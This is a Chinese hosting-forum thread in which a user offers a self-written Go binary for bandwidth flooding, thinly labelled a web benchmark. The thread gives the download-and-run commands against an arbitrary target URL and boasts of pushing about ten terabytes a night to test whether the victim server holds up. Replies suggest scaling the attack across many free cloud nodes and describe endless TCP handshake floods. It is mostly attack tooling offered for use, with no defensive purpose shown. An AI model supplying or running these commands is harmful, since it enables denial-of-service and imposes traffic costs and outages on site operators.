maintell 大佬有话说 :
自己写了一个剑皇工具
本帖最后由 maintell 于 2020-5-20 18:04 编辑
如题,前段时间用了各位大佬发的剑皇工具,发现各位大佬就用shell脚本和wget还是太慢了,居然不能打满带宽
所以用golang写了一个,可以跑满带宽。
比如GCP的小鸡在32线程的情况下可以跑2.7Gbps左右,一晚上干了十来个TB
这个时候就看对方服务器能不能扛得住了
用法:
wget https://git.io/JfzHF
chmod +x webBenchmark_linux_x64
./webBenchmark_linux_x64 -c 32 -s https://target.url
代码是随手写的,请各位不要喷代码
golang写的,下载的就是二进制文件,不是shell脚本!
游乐王子 大佬有话说 :
谢谢,我试试
爱吃醋的醋醋 大佬有话说 :
GCP下载又不收钱,把所有节点开个,可以刷爆炸
陈道临 大佬有话说 :
马克
012 大佬有话说 :
:lol:lol虽然我看不到源码 但是wget拉确实是挺弱智的 实际上不需要确认文件是否正确,也不用确认你本地装不装得下 就直接不断地发tcp握手包确认 然后让对面疯狂发包就完了。。https://cdn.jsdelivr.net/gh/hishis/forum-master/public/images/patch.gif
亿硕云 大佬有话说 :
给个剑皇来试试看
游乐王子 大佬有话说 :
chmod +x webBenchmark_linux_x64
chmod: cannot access ‘webBenchmark_linux_x64’: No such file or directory
运行第二步出错哦。说找不到此目录。
游乐王子 大佬有话说 :
chmod+x webBenchmark_linux_x64
是不是后面少写了一个.sh
centos7
第二行命令运行,提示No such file or directory
告辞 大佬有话说 :
游乐王子 大佬有话说 : 2020-5-20 18:00
chmod +x webBenchmark_linux_x64
chmod: cannot access ‘webBenchmark_linux_x64’: No such file or di …
mv JfzHF webBenchmark_linux_x64https://cdn.jsdelivr.net/gh/hishis/forum-master/public/images/patch.gif
maintell 大佬有话说 :
游乐王子 大佬有话说 : 2020-5-20 18:00
chmod +x webBenchmark_linux_x64
chmod: cannot access ‘webBenchmark_linux_x64’: No such file or di …
麻烦你看下文件下载成功了没?